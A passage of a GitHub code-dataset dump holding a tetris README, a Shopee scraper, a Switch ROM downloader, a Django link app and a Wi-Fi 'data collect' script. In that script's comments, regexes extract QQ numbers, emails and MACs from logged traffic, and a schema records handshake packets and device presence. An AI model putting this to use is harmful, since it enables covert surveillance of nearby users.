for j in range(col):\n array[i][j] = array[i][j] + bg.value()[x + i][y + j]\n if array[i][j] == 2:\n return True\n return False\n \n def get_img(self):\n dp = Dp(self.__dataset)\n return dp.get_img()\n\nif __name__ == '__main__':\n actor = Actor(ACTORS[7])\n print actor.value()\n print actor.shape()\n"
},
{
"alpha_fraction": 0.6322701573371887,
"alphanum_fraction": 0.6454033851623535,
"avg_line_length": 47.45454406738281,
"blob_id": "2d2b6ecc4643032d2d381d46f5c04ba0268bb343",
"content_id": "e5758312bd2badde505ee0736b7e37d98af6c7e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 534,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 11,
"path": "/README.md",
"repo_name": "liuguangyuan/tetris",
"src_encoding": "UTF-8",
"text": "# tetris \n##   1  prepare \n####      1.1 pip install --user numpy \n####      1.2 pip install --user opencv-python(if in mac os x, please install through another method)\n##   2  run\n####      python main.py\n##   3  control\n####      left arrow: move left\n####      right arrow: move right\n####      up arrow: rotate\n####      down arrow: move left accelerately\n"
}
] | 5 |
Khoan-IT/Scrapy-JS | https://github.com/Khoan-IT/Scrapy-JS | 2823b61784d573aee074e9ae65b7d7357f5aa2eb | eb76f08eb30776524caff0f232d29bc5d4f2d6be | 028272ddea77a3a2eca6b0c97cdcfb529211e32d | refs/heads/main | 2023-06-21T23:36:37.790537 | 2021-07-26T03:16:33 | 2021-07-26T03:16:33 | 389,493,435 | 0 | 0 | null | 2021-07-26T03:06:26 | 2021-07-26T03:16:35 | 2021-07-28T14:41:54 | Python | [
{
"alpha_fraction": 0.6812143921852112,
"alphanum_fraction": 0.6812143921852112,
"avg_line_length": 23,
"blob_id": "b54a18ba0ef05720627399dcf4460356e2094a68",
"content_id": "d9f0e838cc87f6c71f0186c20e42f344c1e285f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 527,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 22,
"path": "/demo_scrapy/items.py",
"repo_name": "Khoan-IT/Scrapy-JS",
"src_encoding": "UTF-8",
"text": "# Define here the models for your scraped items\n#\n# See documentation in:\n# https://docs.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\n\n\nclass DemoScrapyItem(scrapy.Item):\n # define the fields for your item here like:\n # name = scrapy.Field()\n product_name = scrapy.Field()\n price_sale =scrapy.Field()\n price = scrapy.Field()\n rate_average = scrapy.Field()\n\n\nclass ProductItem(scrapy.Item):\n name = scrapy.Field()\n price = scrapy.Field()\n price_sale = scrapy.Field()\n sold = scrapy.Field()"
},
{
"alpha_fraction": 0.495340496301651,
"alphanum_fraction": 0.5068100094795227,
"avg_line_length": 30.704545974731445,
"blob_id": "77b91e51a58b22805e01df942569c68b4201cc61",
"content_id": "f0c88cbdaafba4d7cd2cf5ec1c74dbf42f8f7db9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1395,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 44,
"path": "/demo_scrapy/spiders/shopee_crawl.py",
"repo_name": "Khoan-IT/Scrapy-JS",
"src_encoding": "UTF-8",
"text": "import scrapy\nfrom scrapy_splash import SplashRequest\nfrom demo_scrapy.items import ProductItem\n \nclass ShopeeCrawlSpider(scrapy.Spider):\n name = 'shopee_crawl'\n allowed_domains = ['shopee.vn']\n start_urls = ['https://shopee.vn/shop/88201679/search']\n \n render_script = \"\"\"\n function main(splash)\n local url = splash.args.url\n assert(splash:go(url))\n assert(splash:wait(5))\n \n return {\n html = splash:html(),\n url = splash:url(),\n }\n end\n \"\"\" \n \n def start_requests(self):\n for url in self.start_urls:\n yield SplashRequest(\n url,\n self.parse, \n endpoint='render.html',\n args={\n 'wait': 5,\n 'lua_source': self.render_script,\n }\n )\n \n def parse(self, response):\n item = ProductItem()\n \n for product in response.css(\"div.shop-search-result-view__item\"):\n item[\"name\"] = product.css(\"div._36CEnF ::text\").extract_first()\n item[\"price\"] = product.css(\"div._3_-SiN ::text\").extract_first()\n item[\"price_sale\"] = product.css(\"span._29R_un ::text\").extract_first()\n item[\"sold\"] = product.css(\"div.go5yPW ::text\").extract_first()\n \n yield item "
},
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.737609326839447,
"avg_line_length": 37.11111068725586,
"blob_id": "a1960f665897422654e5981173af256036afd95f",
"content_id": "3623c3c58ca05e2fb18c985f5d1db70a64e77374",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 358,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 9,
"path": "/README.md",
"repo_name": "Khoan-IT/Scrapy-JS",
"src_encoding": "UTF-8",
"text": "# Scrapy-JS\n# Sau khi cài Docker:\n + sudo docker pull scrapinghub/splash\n + sudo docker run -p 8050:8050 scrapinghub/splash\n# Thay đổi USER_AGENT:\n + Lấy USER_AGENT tại: https://www.whatismybrowser.com/detect/what-is-my-user-agent\n + Thay đổi USER_AGENT trong file settings.py\n# Crawl dữ liệu\n + scrapy crawl shopee_crawl -o product.json\n"
}
] | 3 |
hotshotz79/NX-RomGet | https://github.com/hotshotz79/NX-RomGet | d7ede6f923c9d9e42626fd0bfd26e6aebc484752 | d2206d34beadfe1fce8d6f3a3bcabe465615e176 | 04a8f5b21034186eeb87188d34f9417584df4f57 | refs/heads/master | 2022-07-04T18:59:37.340168 | 2020-05-15T17:12:15 | 2020-05-15T17:12:15 | 256,834,379 | 13 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7225573062896729,
"alphanum_fraction": 0.7285886406898499,
"avg_line_length": 27.586206436157227,
"blob_id": "e3e2c17bcbf199410fa3d10766448d20d78b03c0",
"content_id": "846906b046429ac08d5e98c44752a44d17fb0e6f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 829,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 29,
"path": "/README.md",
"repo_name": "hotshotz79/NX-RomGet",
"src_encoding": "UTF-8",
"text": "# NX-RomGet\n\nDownload ROMs directly on the switch from user provided list (.txt)\n\nRequires: [PyNx](https://github.com/nx-python/Pynx)\n\n**Touch** support only\n\n# Guide:\n\n1. Download PyNx and extract to sdmc:/switch/PyNx\n2. Download NX-RomGet (main.py) and overwrite PyNx main.py\n3. Create txt files in the PyNx folder in the following way\n \n(a) File name will determine where to save ROMs\n Ex; \"Sega - Genesis.txt\" will save ROMs from that list under sdmc:/Roms/Sega - Genesis/\n \n(b) Each row will include name and download link separate by semi colon\n Ex; \"Sonic 3 (USA);http://link.com/Sonic3.zip\"\n \n **NOTE:** HTTPS link will give error, so try to rename to HTTP\n\n# Screenshots:\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.44915783405303955,
"alphanum_fraction": 0.469016432762146,
"avg_line_length": 32.974544525146484,
"blob_id": "6fbd289cb7f66d819dbfd69bc4ada6c7ed89815f",
"content_id": "c7a57cc670dc5d1dca1c6b2b593aaf32bba24741",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9618,
"license_type": "permissive",
"max_line_length": 215,
"num_lines": 275,
"path": "/main.py",
"repo_name": "hotshotz79/NX-RomGet",
"src_encoding": "UTF-8",
"text": "import imgui\r\nimport imguihelper\r\nimport os\r\nimport _nx\r\nimport runpy\r\nimport sys\r\nfrom imgui.integrations.nx import NXRenderer\r\nfrom nx.utils import clear_terminal\r\nimport time\r\nimport urllib.request\r\nimport urllib.parse\r\nimport zipfile\r\n\r\nsys.argv = [\"\"] # workaround needed for runpy\r\n\r\ndef colorToFloat(t):\r\n nt = ()\r\n for v in t:\r\n nt += ((1/255) * v, )\r\n return nt\r\n\r\n# (r, g, b)\r\nFOLDER_COLOR = colorToFloat((230, 126, 34))\r\nPYFILE_COLOR = colorToFloat((46, 204, 113))\r\nFILE_COLOR = colorToFloat((41, 128, 185))\r\nC_RED = (0.9, 0.0, 0.1)\r\nC_ORANGE = (0.9, 0.4, 0.0)\r\nC_YELLOW = (0.8, 0.9, 0.0)\r\nC_LIME = (0.5, 0.9, 0.0)\r\nC_GREEN = (0.0, 0.9, 0.2)\r\nC_AQUA = (0.0, 0.9, 0.6)\r\nC_BLUE = (0.0, 0.5, 0.9)\r\nC_NAVY = (0.2, 0.0, 0.9)\r\nC_PURPLE = (0.6, 0.0, 0.9)\r\nC_PINK = (0.9, 0.0, 0.8)\r\n\r\nTILED_DOUBLE = 1\r\n\r\n# Progress Bar---------------------------------------\r\ndef reporthook(count, block_size, total_size):\r\n global start_time\r\n if count == 0:\r\n start_time = time.time()\r\n return\r\n duration = time.time() - start_time\r\n progress_size = int(count * block_size)\r\n speed = int(progress_size / (1024 * duration))\r\n percent = min(int(count*block_size*100/total_size),100)\r\n sys.stdout.write(\"\\r...%d%%, %d / %d MB, %d KB/s, %d seconds passed\" %\r\n (percent, progress_size / (1024 * 1024), total_size / (1024 * 1024), speed, duration))\r\n #sys.stdout.write(\"\\rPercent: %d%% | Downloaded: %d of %d MB | Speed: %d KB/s | Elapsed Time: %d seconds\" %\r\n # (percent, progress_size / (1024 * 1024), total_size / (1024 * 1024), speed, duration))\r\n sys.stdout.flush()\r\n\r\n# Start Download-------------------------------------\r\ndef start(filename, url, consolefolder, extract):\r\n # clear both buffers\r\n imguihelper.clear()\r\n _nx.gfx_set_mode(TILED_DOUBLE)\r\n clear_terminal()\r\n \r\n full_file = urllib.parse.unquote(url.split('/')[-1])\r\n # zippath = filename + \".zip\"\r\n print(\"-------------------------------------------------------------------------------\")\r\n print(\"\\n _ _ __ __ ______ _____ _ \" +\r\n \"\\n | \\ | |\\ \\ / / | ___ \\ | __ \\ | | \" +\r\n \"\\n | \\| | \\ V /______| |_/ /___ _ __ ___ | | \\/ ___| |_ \" +\r\n \"\\n | . ` | / \\______| // _ \\| '_ ` _ \\| | __ / _ \\ __|\" +\r\n \"\\n | |\\ |/ /^\\ \\ | |\\ \\ (_) | | | | | | |_\\ \\ __/ |_ \" +\r\n \"\\n \\_| \\_/\\/ \\/ \\_| \\_\\___/|_| |_| |_|\\____/\\___|\\__|\")\r\n print(\"\\n-------------------------------------------------------------------------------\\n\")\r\n print(\"\\n[Rom Selected] \" + filename)\r\n print(\"\\n[Download Path] sdmc:/Roms/\" + consolefolder + \"/\")\r\n print(\"\\n-------------------------------------------------------------------------------\\n\")\r\n print(\"Download Progress:\\n\")\r\n urllib.request.urlretrieve(url, \"sdmc:/Roms/\" + consolefolder + \"/\" + full_file, reporthook)\r\n print(\"\\n\\n File Downloaded\")\r\n \r\n # Extraction Section\r\n if full_file.endswith(\".zip\"):\r\n if extract:\r\n print(\"\\n-------------------------------------------------------------------------------\\n\")\r\n print(\"\\n[Extraction Path] sdmc:/Roms/\" + consolefolder + \"/\" + filename + \"/\")\r\n print(\"Extraction Progress:\\n\")\r\n path_to_extract = \"sdmc:/Roms/\" + consolefolder + \"/\" + filename\r\n zf = zipfile.ZipFile(\"sdmc:/Roms/\" + consolefolder + \"/\" + zippath)\r\n uncompress_size = sum((file.file_size for file in zf.infolist()))\r\n extracted_size = 0\r\n\r\n i = len(zf.infolist())\r\n x = 1\r\n\r\n for file in zf.infolist():\r\n extracted_size += file.file_size\r\n print(\"Extracting \" + str(x) + \" of \" + str(i) + \": \" + file.filename + \" | Size: \" + str(file.file_size / 1000000)[0:5] + \" MB | Progress: \" + str((extracted_size * 100/uncompress_size))[0:3] + \"%\")\r\n zf.extractall(path_to_extract)\r\n x += 1\r\n\r\n imguihelper.initialize()\r\n\r\n# DISPLAY ROMS---------------------------------------\r\ndef romList(console_selected):\r\n # clear both buffers\r\n imguihelper.clear()\r\n _nx.gfx_set_mode(TILED_DOUBLE)\r\n clear_terminal()\r\n imguihelper.initialize()\r\n \r\n renderer = NXRenderer()\r\n checkbox_extract = False\r\n \r\n while True:\r\n renderer.handleinputs()\r\n\r\n imgui.new_frame()\r\n\r\n width, height = renderer.io.display_size\r\n imgui.set_next_window_size(width, height)\r\n imgui.set_next_window_position(0, 0)\r\n imgui.begin(\"\",\r\n flags=imgui.WINDOW_NO_TITLE_BAR | imgui.WINDOW_NO_RESIZE | imgui.WINDOW_NO_MOVE | imgui.WINDOW_NO_SAVED_SETTINGS\r\n )\r\n imgui.set_window_font_scale(1.2)\r\n imgui.text(console_selected.upper())\r\n \r\n # TODO\r\n # ADD Checkbox for \"Delete ZIP after Extract\"\r\n \r\n # Create Selected Systems Directory\r\n directory = console_selected\r\n parent_dir = \"sdmc:/Roms\"\r\n path = os.path.join(parent_dir, directory)\r\n try:\r\n os.makedirs(path, exist_ok = True)\r\n except OSError as error:\r\n print(\"Directory '%s' can not be created\" % directory)\r\n \r\n button_number = 0\r\n imgui.separator()\r\n imgui.new_line()\r\n \r\n # Go Back\r\n imgui.push_style_color(imgui.COLOR_BUTTON, *FOLDER_COLOR)\r\n if imgui.button(\"GO BACK\", width=288, height=60):\r\n main()\r\n imgui.pop_style_color(1)\r\n \r\n # Checkbox for Extracting\r\n imgui.same_line(spacing=50)\r\n _, checkbox_extract = imgui.checkbox(\"EXTRACT .ZIP AFTER DOWNLOAD\", checkbox_extract)\r\n \r\n imgui.new_line()\r\n \r\n imgui.separator()\r\n \r\n firstRow = True;\r\n txtFile = console_selected + \".txt\"\r\n file = open(txtFile,\"r\")\r\n \r\n # Generate button for each record found\r\n for line in file:\r\n fields = line.split(\";\")\r\n title = fields[0]\r\n link = fields[1]\r\n \r\n if button_number == 4:\r\n imgui.new_line()\r\n button_number = 0\r\n else:\r\n imgui.same_line()\r\n \r\n if firstRow == True:\r\n imgui.new_line()\r\n firstRow = False\r\n \r\n imgui.push_style_color(imgui.COLOR_BUTTON, *FILE_COLOR)\r\n if imgui.button(title.upper(), width=288, height=60):\r\n start(title, link, console_selected, checkbox_extract)\r\n \r\n imgui.pop_style_color(1)\r\n \r\n button_number += 1\r\n\r\n file.close()\r\n\r\n imgui.end()\r\n\r\n imgui.render()\r\n renderer.render()\r\n\r\n renderer.shutdown()\r\n \r\n\r\n# MAIN-----------------------------------------------\r\ndef main():\r\n renderer = NXRenderer()\r\n currentDir = os.getcwd()\r\n\r\n while True:\r\n renderer.handleinputs()\r\n\r\n imgui.new_frame()\r\n\r\n width, height = renderer.io.display_size\r\n imgui.set_next_window_size(width, height)\r\n imgui.set_next_window_position(0, 0)\r\n imgui.begin(\"\",\r\n flags=imgui.WINDOW_NO_TITLE_BAR | imgui.WINDOW_NO_RESIZE | imgui.WINDOW_NO_MOVE | imgui.WINDOW_NO_SAVED_SETTINGS\r\n )\r\n imgui.set_window_font_scale(2.0)\r\n imgui.text(\"NX-RomGet (ver 0.1)\")\r\n \r\n # Create ROMS folder if it doesnt exist\r\n directory = \"Roms\"\r\n parent_dir = \"sdmc:/\"\r\n path = os.path.join(parent_dir, directory)\r\n try:\r\n os.makedirs(path, exist_ok = True)\r\n except OSError as error:\r\n print(\"Directory '%s' can not be created\" % directory)\r\n \r\n # ------------- COLORS -------------\r\n # C_RED | C_ORANGE | C_YELLOW | C_LIME | C_GREEN\r\n # C_AQUA | C_BLUE | C_NAVY | C_PURPLE |C_PINK\r\n \r\n # Check which Console Files exist (.txt)\r\n console_files = []\r\n for e in os.listdir():\r\n if e.endswith(\".txt\"):\r\n console_files.append(e.replace(\".txt\", \"\"))\r\n console_files = sorted(console_files)\r\n \r\n btn_number = 0\r\n starting_row = True;\r\n \r\n # Generate buttons for each Console File found\r\n for e in console_files:\r\n \r\n if btn_number == 3:\r\n imgui.new_line()\r\n btn_number = 0\r\n else:\r\n imgui.same_line()\r\n \r\n if starting_row == True:\r\n imgui.new_line()\r\n starting_row = False\r\n \r\n if e.startswith(\"Nintendo\"):\r\n imgui.push_style_color(imgui.COLOR_BUTTON, *C_RED)\r\n elif e.startswith(\"Sega\"):\r\n imgui.push_style_color(imgui.COLOR_BUTTON, *C_NAVY)\r\n elif e.startswith(\"Sony\"):\r\n imgui.push_style_color(imgui.COLOR_BUTTON, *C_PURPLE)\r\n elif e.startswith(\"Final\"):\r\n imgui.push_style_color(imgui.COLOR_BUTTON, *C_GREEN)\r\n else:\r\n imgui.push_style_color(imgui.COLOR_BUTTON, *C_ORANGE)\r\n if imgui.button(e, width=390, height=150):\r\n romList(e) \r\n imgui.pop_style_color(1)\r\n \r\n btn_number += 1\r\n \r\n #------------------------------\r\n \r\n imgui.end()\r\n\r\n imgui.render()\r\n renderer.render()\r\n\r\n renderer.shutdown()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n"
}
] | 2 |
AmbassadorCR/leenks | https://github.com/AmbassadorCR/leenks | 3a432b459523f44c7a40ec4e4d855c8bb297b328 | 246bb714d8c3428779ce8b4ee41d4093833fa123 | 236fa996299b8af3758338dc7ce805cd9fc7dce8 | refs/heads/master | 2021-01-02T09:20:27.012867 | 2013-11-21T09:37:13 | 2013-11-21T09:37:13 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7482014298439026,
"alphanum_fraction": 0.7769784331321716,
"avg_line_length": 26.799999237060547,
"blob_id": "2a6c318e316341dd6725d0a38581fd1bfab4431b",
"content_id": "5dba19192524b9c64f2961d2217305c23f4dfcfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 139,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 5,
"path": "/links/models.py",
"repo_name": "AmbassadorCR/leenks",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass Link(models.Model):\n\ttitle = models.CharField(max_length=200)\n\tclicks = models.IntegerField(default=0)\n"
},
{
"alpha_fraction": 0.4898523986339569,
"alphanum_fraction": 0.4898523986339569,
"avg_line_length": 29.08333396911621,
"blob_id": "cd85debb5f73c1aad11aa8b8b19ed326284a1537",
"content_id": "df1e79456cca7ce2a2ebbc4a25cc52f2623297e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1084,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 36,
"path": "/TBLeenks/static/js/LinksController.js",
"repo_name": "AmbassadorCR/leenks",
"src_encoding": "UTF-8",
"text": " function LinksListCtrl($scope, $http) {\n $scope.newLink = {title: ''};\n $scope.listLinks = function() {\n $http({method: 'GET', url: '/links/'}).\n success(function(data, status, headers, config) {\n $scope.links = data.results; \n $scope.view = './partials/list.html'; \n })\n };\n\n $scope.delete = function(id){\n $http({method: 'DELETE', url: '/links/'+id}).\n success(function(data, status, headers, config) {\n $scope.listLinks();\n })\n };\n \n\n $scope.edit = function(link){\n $http.put('/links/'+link.id, link).\n success(function(data, status, headers, config) {\n $scope.listLinks();\n })\n };\n\n $scope.create = function(){\n $http.post('/links/', $scope.newLink).\n success(function(data, status, headers, config) {\n $scope.listLinks();\n })\n }\n\n $scope.view = './partials/list.html'; \n $scope.listLinks();\n }\n LinksListCtrl.$inject = ['$scope', '$http'];"
},
{
"alpha_fraction": 0.7361853718757629,
"alphanum_fraction": 0.7504456043243408,
"avg_line_length": 26.700000762939453,
"blob_id": "07ec30a1e087e44d27985d3d0bd2c4d0234da66c",
"content_id": "1c8a11f0f0dbef40c8c59aeac5d10909a5933848",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 561,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 20,
"path": "/links/views.py",
"repo_name": "AmbassadorCR/leenks",
"src_encoding": "UTF-8",
"text": "from links.models import Link\nfrom rest_framework import viewsets\nfrom links.serializers import LinkSerializer\nfrom django.shortcuts import redirect\nfrom django.http import Http404 \n\nclass LinkViewSet(viewsets.ModelViewSet):\n queryset = Link.objects.all()\n serializer_class = LinkSerializer\n\ndef redirectView(request):\n\tlinkQuery = Link.objects.filter(title=request.path[3:])\n\n\tif linkQuery.exists():\n\t\tlink = linkQuery.first();\n\t\tlink.clicks += 1;\n\t\tlink.save();\n\t\treturn redirect('/static/Leenks.html?link=' + link.title)\n\telse:\n\t\traise Http404\n\n\t\n\n\t\n\n"
},
{
"alpha_fraction": 0.751968502998352,
"alphanum_fraction": 0.751968502998352,
"avg_line_length": 24.299999237060547,
"blob_id": "f3d0d127db9fe35ef6a5a1bb57b1c679c8db34de",
"content_id": "c8f6bc2842de11092c0b302e3d348febf817ab37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 508,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 20,
"path": "/TBLeenks/urls.py",
"repo_name": "AmbassadorCR/leenks",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, include, url\nfrom rest_framework import routers\nfrom django.contrib import admin\nfrom links import views\n\n\nadmin.autodiscover()\n\nrouter = routers.SimpleRouter()\nrouter.register(r'links', views.LinkViewSet)\n\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n url(r'^', include(router.urls)),\n url(r'^r/', views.redirectView)\n)\n\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nurlpatterns += staticfiles_urlpatterns()\n\n\n"
},
{
"alpha_fraction": 0.6842105388641357,
"alphanum_fraction": 0.6842105388641357,
"avg_line_length": 29.399999618530273,
"blob_id": "95dd56c525dc53b682d2d49d2a271cce2e4a2218",
"content_id": "5ab18848a43a23f76b0716aa89f30f070db3dd42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 304,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 10,
"path": "/links/serializers.py",
"repo_name": "AmbassadorCR/leenks",
"src_encoding": "UTF-8",
"text": "from links.models import Link\nfrom rest_framework import serializers\n\nclass LinkSerializer(serializers.HyperlinkedModelSerializer):\n num_clicks = serializers.Field(source='clicks')\n \n class Meta:\n model = Link\n fields = ['id', 'title', 'num_clicks']\n read_only_fields = ['id']\n"
}
] | 5 |
Octoberr/linuxdatacollect | https://github.com/Octoberr/linuxdatacollect | 58bb97e2e126925b2be92bf66ad7b0c4c997c3d6 | 9c77f7dc886bfcba8e31bfc5b37985581bf70063 | 0f06e80fd7c9c95b4cbb5035db8d3ac140fcb10e | refs/heads/master | 2021-05-10T07:59:49.653769 | 2018-04-20T01:21:02 | 2018-04-20T01:21:02 | 118,869,649 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.524483323097229,
"alphanum_fraction": 0.5378886461257935,
"avg_line_length": 29.17977523803711,
"blob_id": "97427915d26a1633e6d3e4c59ff798ec5401d0a2",
"content_id": "8675cb438ddf27c50e6b439576914be052dcbc4b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5647,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 178,
"path": "/pubfunc/getthezengze.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\n正则表达式匹配测试\ncreate by SWM\n2017/12/29\nincrease mongoquery interface\n2018/01/04\n\"\"\"\nimport re\nimport json\nimport datetime\nimport pymongo\nfrom config import mongo\nimport os\nimport time\nfileDir = os.path.dirname(os.path.realpath(__file__))\n\n\n# 获得一个文件夹下所有可读文件的列表\n# def getallthefilename(directorypath):\n# allfilenames = []\n# for root, dirs, files in os.walk(directorypath):\n# for filename in files:\n# # print(filename)\n# allfilenames.append(filename)\n# return allfilenames\n\n\n# mongodb数据库localhost,集合terminal\ndef insertintoterminal(spiderdata):\n client = pymongo.MongoClient(host=mongo['host'], port=mongo['port'])\n db = client.swmdb\n information = db.terminal\n information.insert(spiderdata)\n print(datetime.datetime.now(), 'insert terminal success')\n\n\n# mongodb数据库localhost,集合wifi\n# def insertintowifi(spiderdata):\n# client = pymongo.MongoClient(host=mongo['host'], port=mongo['port'])\n# db = client.swmdb\n# information = db.wifi\n# information.insert(spiderdata)\n# print(datetime.datetime.now(), 'insert wifi success')\n\n\n# def selectsomething(arg1, arg2, arg3, arg4):\n# client = pymongo.MongoClient(host=mongo['host'], port=mongo['port'])\n# db = client.swmdb\n# information = db.saveoutfile\n# # 迭代器\n# cursor = information.find({\"arg\": arg1}, {\"arg\": 1}).sort(\"arg\", -1).limit(1)\n# while True:\n# data = next(cursor)\n# if something:\n# return data\n # for el in cursor:\n # havedate = datetime.datetime.strptime(el[\"Info\"]['Date'], \"%Y-%m-%dT%H:%M:%S\").date()\n # return havedate\n\n\ndef getthephoneinformation(filepath):\n # re_connect = re.compile(r'AP-STA-CONNECTED.(\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+)')\n # re_disconnect = re.compile(r'AP-STA-DISCONNECTED.(\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+)')\n\n #匹配当前时间\n re_time = re.compile(r'(\\S{3}) (\\d{2})\\, (\\d{4}) (\\d{2})\\:(\\d{2})\\:(\\d{2})')\n # re_time = re.compile(r'\\d{4}.\\d{2}\\:\\d{2}\\:\\d{2}')\n # 匹配具有标识的字符串,如abc=****;\n # re_usragen = re.compile(r'User-Agent=\\S+;') # User-Agent=(.*?);\n # re_usragen = re.compile(r'User-Agent=(.*?);') # User-Agent=(.*?);\n # 匹配qq邮箱\n # re_mailcount = re.compile(r'[\\d]+@[\\w.]+')\n # 匹配qq号,数字9位到13位\n # re_qqnumber = re.compile(r'\\d{9,10}')\n # 匹配ip地址\n # re_ipnumber = re.compile(r'\\d+\\.\\d+\\.\\d+\\.\\d+')\n # 匹配mac地址\n # re_mac = re.compile(r'\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+')\n # 匹配gif图片\n # [\\w.]+[\\d.]\\.gif 字母加数字\n # re_gif = re.compile(r'[\\S.]+\\.gif')\n # 匹配网站\n # re_net = re.compile(r'[\\w.]+\\.com|[\\w.]+\\.cn')\n file = open(filepath, \"r\").readlines()\n for line in file:\n fac = re_time.match(line)\n print fac.group(3)\n break\n # with open(filepath, \"r\") as file:\n # lines = file.read()\n # fac = re_time.findall(file)\n # print fac\n conf = {}\n conf['Jan'] = 1\n conf['Feb'] = 2\n conf['Mar'] = 3\n conf['Apr'] = 4\n conf['May'] = 5\n conf['Jun'] = 6\n conf['Jul'] = 7\n conf['Aug'] = 8\n conf['Sep'] = 9\n conf['Oct'] = 10\n conf['Nov'] = 11\n conf['Dec'] = 12\n origintime = datetime.datetime(int(fac.group(3)), conf[fac.group(1)], int(fac.group(2)), int(fac.group(4)), int(fac.group(5)), int(fac.group(6)))\n # unixtime = time.(int(fac[2]), conf[fac[0]], int(fac[1]), int(fac[3]), int(fac[4]), int(fac[5]))\n unixtime = int(time.mktime(origintime.timetuple()))\n print unixtime\n print origintime\n # for line in lines:\n # connect = re_connect.search(line)\n # # discon = re_disconnect.match(line)\n # if connect:\n # print connect.group(1)\n # disconnect = re_disconnect.search(line)\n # if disconnect:\n # print disconnect.group(1)\n # print type(disconnect.group(1))\n # print connect\n# nowtime = re_time.findall(line)\n# usragent = re_usragen.findall(line)\n# email = re_mailcount.findall(line)\n# qq = re_qqnumber.findall(line)\n# ip = re_ipnumber.findall(line)\n# mac = re_mac.findall(line)\n# gif = re_gif.findall(line)\n# net = re_net.findall(line)\n# tmp['tmie'] = nowtime\n# tmp['usragent'] = usragent\n# tmp['email'] = email\n# tmp['qq'] = qq\n# tmp['ip'] = ip\n# tmp['macaddress'] = mac\n# tmp['gifsources'] = gif\n# tmp['netaddress'] = net\n# with open('outpufile.json', 'a') as outfile:\n# json.dump(tmp, outfile)\n# insertintomongo(tmp)\n# 终端采集数据\n# def theterminaldata():\n# term = {}\n# # 设备mac\n# term['device_mac'] =\n# # 厂商\n# term['company'] =\n# # 上网时间\n# term['on_net_time'] =\n# # 离开时间\n# term['off_net_time'] =\n# # 信号强度\n# term['signal_strength']=\n# # 数据包\n# term['data_pack'] =\n\n# def thewifidata():\n# wifi = {}\n# # mac\n# wifi['bssid'] =\n# # essid wifi名称\n# wifi['essid'] =\n# # rssi 信号强度\n# wifi['rssi'] =\n# # 握手包\n# wifi['handshake_data'] =\n# # CH 频段\n# wifi['CH']=\n# # MB 带宽\n# wifi['MB']=\n# # ENC加密体系\n# wifi['ENC']=\n# #CIPHER加密算法\n# wifi['CIPHER']=\n\nif __name__ == '__main__':\n log = os.path.join(fileDir, '..', 'script', 'teminal.log')\n getthephoneinformation(log)"
},
{
"alpha_fraction": 0.5979228615760803,
"alphanum_fraction": 0.6350148320198059,
"avg_line_length": 24.961538314819336,
"blob_id": "9278f52ff58e7168fabab13a30bedb608186d107",
"content_id": "0d764e32968f5a2b4821642be61de22932c20d67",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 674,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 26,
"path": "/terminal/allconfig.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
